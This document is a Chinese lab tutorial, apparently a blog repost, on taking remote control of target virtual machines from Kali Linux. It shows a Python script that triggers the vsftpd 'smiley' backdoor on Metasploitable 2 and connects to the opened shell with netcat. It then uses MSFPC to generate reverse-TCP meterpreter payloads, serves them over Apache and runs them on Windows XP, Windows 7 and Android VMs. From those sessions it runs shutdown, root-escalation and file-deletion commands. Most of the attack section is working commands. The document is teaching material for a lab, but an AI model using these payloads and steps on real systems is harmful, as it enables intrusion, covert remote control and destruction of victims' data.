赞
踩
目录
步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(WinXPenSP3)下载被控端并运行。
步骤五:类似上述操作,控制目标靶机二(32位Windows7)
步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(安卓虚拟机)下载被控端并运行。
Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)
nc -v 192.168.110.131 80
注:用自己目标靶机的IP
nc 192.168.110.131 80
I:激活笑脸漏洞,使其开启6200端口:
编写python脚本(文件名:backdoor.py):
- cd /usr/bin
- vi backdoor.py
- import socket
- from ftplib import FTP
- host_ip="192.168.110.131"
- ftp = FTP()
- backdoorstr = "hello:)"
- backdoorpass='me'
- try:
- ftp.connect(host_ip,21,timeout=2)
- ftp.login(backdoorstr,backdoorpass)
- except:
- print("yes good")
注:host_ip="192.168.110.131"也是自己靶机的ip
执行并验证:
python backdoor.py
成功激活笑脸漏洞
nmap -p 6200 192.168.110.131
查看靶机6200端口是否开启,open(是以打开的意思)
I: 显示指定目录下的内容
nc 192.168.110.131 6200
已经成功连接
命令“whoami”是显示指定工作目录下的内容
II: 尝试其它测试命令
”ls“显示当前位置下的目录和文件
按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)
按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。
在Kali 2中生成被控端的工具:MSFPC(msfvenom的优化版)
测试windows系统实验使用的网络环境,填写以下IP地址:
测试用windows系统(WinXPenSP)的IP: 192.168.110.132
测试用windows 7系统(32位Windows7)的IP: 192.168.110.133
虚拟机Kali Linux 2的IP: 192.168.110.130
注:记得换成自己对应的ip
msfpc windows 192.168.110.130
- sudo cp windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/
- ls /var/www/html/
2、启动apache2
检查apache2服务是否启动
service apache2 start
也可以用systemctl start apache2
systemctl status apache2
3、到目标靶机(WinXPenSP3)下载被控端并运行
(1)给被控端改一个好记的名字。
- sudo mv windows-meterpreter-staged-reverse-tcp-443.exe /var/www/html/win.exe
- ls /var/www/html/
(2)在目标靶机下载被控端
在靶机上用浏览器打192.168.110.130/win.exe
(3)运行被控端
配置对应的主控端
msfconsole -q -r '/home/kali/windows-meterpreter-staged-reverse-tcp-443.exe'
- sessions
- sessions 1
ls -l
Shell
看版本systeminfo
设置1000毫秒后关机,并弹出提示信息“hello!”。
shutdown -s -t 10000 -c "hello!"
4、退出shell
4、查看并选择会话3,控制32位windows7。
5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。
(1)输入shell
(2)查看操作系统信息
(3)延时关闭系统并显示提示信息
如果要结束会话1,使用什么命令?
background
测试android系统实验使用的网络环境,填写以下IP地址:
测试用android系统的IP: 192.168.110.134
虚拟机Kali Linux 2的IP: 192.168.110.130
将被控端改名为:android
2、启动apache2
检查apache2服务是否启动?
如果没有启动,启动apache2。
3、到目标靶机(安卓虚拟机)下载被控端并运行
(1)在目标靶机(安卓虚拟机)下载被控端
(2)运行被控端
更改设置:允许安装来自未知来源的应用。
更改之后,再次运行被控端,并选择打开。
配置对应的主控端(一定要用root身份运行)
安卓机运行被控端之前,如下图。
安卓机运行被控端之后,如下图。
2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。
查看当前用户帐号。
查看操作系统信息。
切换到root用户。
(1)在安卓虚拟机中弹出提示信息,选择“拒绝”。
在kali中可以看到操作结果是什么?
(2)在安卓虚拟机中弹出提示信息,选择“允许”。
在kali中可以看到操作结果是什么?
在kali中输入whoami,显示当前用户。
切换为root用户之后,可以对安卓机进行最大权限的控制,比如关闭selinux、读取文件等。
I:当前安卓机的selinux状态:许可
II:尝试在Download目录下载一个windows的被控端。
切换到Download目录,查看当前目录的所有文件:
下载windows的被控端win.exe和txt文件haha.txt:
III:删除Download目录中的所有文件
3、退出
MSFPC全称“MSFvenom Payload Creator”是一个基于用户选择生成多种类型有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。
完全自动化msfvenom&Metasploit是最终目标 (以及能够自动化MSFPC本身)。剩下的就是让用户的生活尽可能简单(如IP选择菜单,msfconsole资源文件/命令,批量有效载荷生成,并能够以任意顺序(以各种格式/模式)输入任何参数 )。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。